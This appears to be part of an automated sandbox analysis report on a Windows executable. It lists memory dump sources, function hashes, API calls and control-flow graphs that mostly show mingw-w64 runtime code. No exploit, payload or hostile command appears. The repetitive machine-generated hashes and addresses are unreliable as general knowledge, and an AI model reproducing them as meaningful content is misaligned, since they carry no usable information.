                                                                                                              • API ID: Value$Free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2242701089-0
                                                                                                              • Opcode ID: 8401260f891ce7ee36d79187eb38dcddfd7f879feec07dce31bbb832c6b4651b
                                                                                                              • Instruction ID: 42bae41da23860d49154583d3ec334075b3e28d8769c84fb5cf6fab533855835
                                                                                                              • Opcode Fuzzy Hash: 8401260f891ce7ee36d79187eb38dcddfd7f879feec07dce31bbb832c6b4651b
                                                                                                              • Instruction Fuzzy Hash: 42F0F235F0AA0382EE10AB5DECD50392771BB94324F945076D80E82AFA9E2CA515CA02

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: malloc$memcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3800483350-0
                                                                                                              • Opcode ID: a152af894395d2bb494a594f74d99edcfdeeb986df4bcacabe97efcbe2bee334
                                                                                                              • Instruction ID: 15dd3416ca6ee402052e312dcdfaa135ec8f8ba426eec8b2c5dead9d7da63f60
                                                                                                              • Opcode Fuzzy Hash: a152af894395d2bb494a594f74d99edcfdeeb986df4bcacabe97efcbe2bee334
                                                                                                              • Instruction Fuzzy Hash: A1317E76F0960685EE92DF49FC807B923A4FB04795F544136CA1E877D6EF3CA4848742

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscpywcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3616488086-0
                                                                                                              • Opcode ID: e9cafbc27a721eb04ca846efd46672ba4e3ba8a3ba5c4548f5d8021114cec811
                                                                                                              • Instruction ID: aeb249a56b64495a1bdf6f7769922129fd48a5ee7e2bbb20affdb4ddc9a924fd
                                                                                                              • Opcode Fuzzy Hash: e9cafbc27a721eb04ca846efd46672ba4e3ba8a3ba5c4548f5d8021114cec811
                                                                                                              • Instruction Fuzzy Hash: 6D21FD22A0924591EA609F11FC407AB6664FB84794F500231EF9D46BDADF7DD146C705

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcslen$wcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3662116142-0
                                                                                                              • Opcode ID: e61fb398a03bbfa57f4b8b3f1698cb4d99b17f12373dd6c6e7874bf35d2a17d8
                                                                                                              • Instruction ID: df50c6c445716506b9e66e1b0b9dbcdd7ddd92186bd86fcb8ce04e92ec8c8dff
                                                                                                              • Opcode Fuzzy Hash: e61fb398a03bbfa57f4b8b3f1698cb4d99b17f12373dd6c6e7874bf35d2a17d8
                                                                                                              • Instruction Fuzzy Hash: 49010462B0D68140E6A0EA12FC407EA5651AF89BD0F644131FE8D47BCECE3CD1418709

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 251 7ff624ac55c8-7ff624ac55eb 252 7ff624ac55f1-7ff624ac55f6 251->252 253 7ff624ac5740-7ff624ac5744 251->253 255 7ff624ac5653-7ff624ac5658 252->255 256 7ff624ac55f8-7ff624ac55fd 252->256 253->252 254 7ff624ac574a 253->254 257 7ff624ac56a0 254->257 258 7ff624ac565e 255->258 259 7ff624ac5715-7ff624ac5725 call 7ff624acb530 255->259 260 7ff624ac55ff-7ff624ac5604 256->260 261 7ff624ac5672-7ff624ac5682 signal 256->261 268 7ff624ac56a5-7ff624ac56aa 257->268 262 7ff624ac56b0-7ff624ac56b5 258->262 263 7ff624ac5660-7ff624ac5665 258->263 265 7ff624ac5727-7ff624ac572a 259->265 282 7ff624ac5760-7ff624ac5774 signal 259->282 260->257 267 7ff624ac560a 260->267 264 7ff624ac5688-7ff624ac569c signal call 7ff624ac4f80 261->264 261->265 262->257 276 7ff624ac56b7-7ff624ac56bc 262->276 263->257 269 7ff624ac5667-7ff624ac566c 263->269 264->257 274 7ff624ac56fe-7ff624ac5708 265->274 275 7ff624ac572c-7ff624ac5738 265->275 272 7ff624ac56f0-7ff624ac56f5 267->272 273 7ff624ac5610-7ff624ac5615 267->273 269->261 269->274 277 7ff624ac56be-7ff624ac56ce signal 272->277 278 7ff624ac56f7-7ff624ac56fc 272->278 273->257 283 7ff624ac561b-7ff624ac5620 273->283 279 7ff624ac5750-7ff624ac5757 274->279 280 7ff624ac570a-7ff624ac5711 274->280 275->268 276->274 276->277 285 7ff624ac56d4-7ff624ac56d7 277->285 286 7ff624ac5779-7ff624ac578b signal 277->286 278->257 278->274 280->259 282->268 283->274 287 7ff624ac5626-7ff624ac5636 signal 283->287 285->274 290 7ff624ac56d9-7ff624ac56e5 285->290 286->268 288 7ff624ac5790-7ff624ac57a2 signal 287->288 289 7ff624ac563c-7ff624ac563f 287->289 288->268 289->274 291 7ff624ac5645-7ff624ac5651 289->291 290->268 291->268
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: signal
                                                                                                              • String ID: CCG
                                                                                                              • API String ID: 1946981877-1584390748
                                                                                                              • Opcode ID: 10537504a00196a9b3d94431f1b0aef2330f68600c29619b56e7bd5272f2aefb
                                                                                                              • Instruction ID: f85ea7df950310c56a814c4943a0a9d16b049bb66c5ce2e7a46f1cfe38f2e1c9
                                                                                                              • Opcode Fuzzy Hash: 10537504a00196a9b3d94431f1b0aef2330f68600c29619b56e7bd5272f2aefb
                                                                                                              • Instruction Fuzzy Hash: D6414560E1952646FFF856A8DCD037921825F893A4F7C8A31E56EC23EBDE1DE8801217
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1297977491-0
                                                                                                              • Opcode ID: 3e4dabc2adb5626542df54d3314d2d31032bb80ac9b7b60cb051a708b68b7f76
                                                                                                              • Instruction ID: 7498f7217bbab33400c9bfe9c3fe948a006b47a896db202f26813d56f0691614
                                                                                                              • Opcode Fuzzy Hash: 3e4dabc2adb5626542df54d3314d2d31032bb80ac9b7b60cb051a708b68b7f76
                                                                                                              • Instruction Fuzzy Hash: E0D1E421B0968285FF90DB29ED943B967A0AF55B84F548036EA4D877DBEF7DE040C702
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: 17135af469ff3c6c0ec809a47a8bb573385b63787fb45230f64c77c16d810278
                                                                                                              • Instruction ID: 3491b277ee8621324ce2ea4520bbee6be17dd54e18eadaedd9125cccb9c839f8
                                                                                                              • Opcode Fuzzy Hash: 17135af469ff3c6c0ec809a47a8bb573385b63787fb45230f64c77c16d810278
                                                                                                              • Instruction Fuzzy Hash: 23C2DB32A1C6418BDBA18F25E88077AB795FB95784F204135EA4A97BDEDF3DE4408F01
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
                                                                                                              • Instruction ID: 8a58c138a3956a389cfd1bf6370f2267c20e30d28c1b8d47d427a0a739bc42f4
                                                                                                              • Opcode Fuzzy Hash: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
                                                                                                              • Instruction Fuzzy Hash: 09E0B67AA08B84818614DB52F48005EBB74F7D97C4B504916FEDC53B1ACF3CC1A08B40

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 203 7ff624ac62f0-7ff624ac630c 204 7ff624ac630e-7ff624ac6315 203->204 205 7ff624ac6328-7ff624ac632f 203->205 206 7ff624ac6317-7ff624ac6323 204->206 207 7ff624ac6331-7ff624ac6359 GetLastError TlsGetValue SetLastError 205->207 208 7ff624ac63a0-7ff624ac63a6 205->208 211 7ff624ac6410-7ff624ac642a call 7ff624acb4d0 207->211 212 7ff624ac635f-7ff624ac6365 207->212 209 7ff624ac63ac-7ff624ac63b6 208->209 210 7ff624ac64ba-7ff624ac64c1 208->210 213 7ff624ac64e8-7ff624ac64f0 209->213 214 7ff624ac63bc-7ff624ac63c4 209->214 210->207 215 7ff624ac64c7-7ff624ac64dd 210->215 230 7ff624ac6430 211->230 231 7ff624ac6543-7ff624ac6553 abort 211->231 217 7ff624ac6458-7ff624ac647f call 7ff624acb528 212->217 218 7ff624ac636b-7ff624ac6377 212->218 221 7ff624ac64a1-7ff624ac64a6 call 7ff624ac6290 213->221 222 7ff624ac64f2-7ff624ac650a 213->222 219 7ff624ac651c-7ff624ac6530 WaitForSingleObject 214->219 220 7ff624ac63ca-7ff624ac63d1 214->220 217->231 235 7ff624ac6485-7ff624ac649f memset 217->235 218->206 224 7ff624ac6379-7ff624ac6386 call 7ff624ac61f0 218->224 219->220 232 7ff624ac6536-7ff624ac653e 219->232 220->215 227 7ff624ac63d7-7ff624ac63db 220->227 228 7ff624ac64b0-7ff624ac64b4 221->228 222->228 229 7ff624ac650c 222->229 224->206 227->207 237 7ff624ac63e1-7ff624ac63e9 227->237 228->210 228->214 238 7ff624ac6510-7ff624ac6518 Sleep 229->238 239 7ff624ac6433-7ff624ac6444 TlsSetValue 230->239 240 7ff624ac6560-7ff624ac6564 231->240 241 7ff624ac6555-7ff624ac6558 231->241 232->220 235->239 237->207 245 7ff624ac63ef-7ff624ac6404 ReleaseSemaphore 237->245 238->238 246 7ff624ac651a 238->246 239->218 247 7ff624ac644a-7ff624ac644d GetLastError 239->247 243 7ff624ac6566 240->243 244 7ff624ac656a-7ff624ac656d 240->244 241->240 243->244 248 7ff624ac656f-7ff624ac6572 244->248 249 7ff624ac6574 244->249 245->207 246->228 247->218 248->249 250 7ff624ac6578-7ff624ac657c 248->250
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$Value
                                                                                                              • String ID:
                                                                                                              • API String ID: 1883355122-0
                                                                                                              • Opcode ID: 6786d91fb8037d0c2d39c0e5c889f81c76e1a462fac33a80f61b93c8b5500b6e
                                                                                                              • Instruction ID: 0d2cced6a7a57923e4f7d140e4d317e616afaea973549e316ca6276d327bc924
                                                                                                              • Opcode Fuzzy Hash: 6786d91fb8037d0c2d39c0e5c889f81c76e1a462fac33a80f61b93c8b5500b6e
                                                                                                              • Instruction Fuzzy Hash: BF614931B0A64685EE95DB2DED8467933A0BF44F85F688036D90D877DADE3DE842C342

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$CriticalDeleteSectionfree
                                                                                                              • String ID:
                                                                                                              • API String ID: 2588641659-0
                                                                                                              • Opcode ID: 25fcd06e749af0576e577c08f9ed352b31984f942d49ab70c6168451ae3f547f
                                                                                                              • Instruction ID: 6bfc1323e013faebf0ed94a8d785610bea4671a8e56d34aad34c490eda76310b
                                                                                                              • Opcode Fuzzy Hash: 25fcd06e749af0576e577c08f9ed352b31984f942d49ab70c6168451ae3f547f
                                                                                                              • Instruction Fuzzy Hash: F931B375E0EA1786FF609B5DECD823967B0BF54751FA40072D40E866FADF2CA4548B02

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fwprintf
                                                                                                              • String ID: %*.*S$%-*.*S$%.*S
                                                                                                              • API String ID: 968622242-2115465065
                                                                                                              • Opcode ID: 5daa3b2eaedae02b5240df7bdf5be835bd8279490fa851b47f03983a3476463e
                                                                                                              • Instruction ID: ea77aa942887527cc75ae09e11b6e86cc5180ad60410f2bfedb663ec53990169
                                                                                                              • Opcode Fuzzy Hash: 5daa3b2eaedae02b5240df7bdf5be835bd8279490fa851b47f03983a3476463e
                                                                                                              • Instruction Fuzzy Hash: EA4185B2A5855285FF90CB2DDC847796391AB84F94F248135DE1C876CFDE3DE4418702

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$_assertcalloc
                                                                                                              • String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
                                                                                                              • API String ID: 3698345500-799109717
                                                                                                              • Opcode ID: 193aee4b8652b9a4711a7f79661b0c185f6626f0d83d2310d0e12b61004fedfa
                                                                                                              • Instruction ID: 60df6405c2f545b8001006f411ed51d1a349a06495dda9930147baeef427e169
                                                                                                              • Opcode Fuzzy Hash: 193aee4b8652b9a4711a7f79661b0c185f6626f0d83d2310d0e12b61004fedfa
                                                                                                              • Instruction Fuzzy Hash: 95019271F0970246FF518B9DFDC02B622A5AF08790F984035D90CC77D6EE2CA981C302
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fwprintf
                                                                                                              • String ID: %*.*s$%-*.*s$%.*s
                                                                                                              • API String ID: 968622242-4054516066
                                                                                                              • Opcode ID: 6b71628f83c7297f6daff442497210da6089d8619bbe6908fb57a9677483f1d8
                                                                                                              • Instruction ID: e9814529bc3c363bd784fe9680f13dc086f2f9f813287c3daf9225d80045ed41
                                                                                                              • Opcode Fuzzy Hash: 6b71628f83c7297f6daff442497210da6089d8619bbe6908fb57a9677483f1d8
                                                                                                              • Instruction Fuzzy Hash: 96F05B62A0C602C4FEE0DB1DED811741374AB44B95F605235DA1CC65EFDE2CD5518712
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
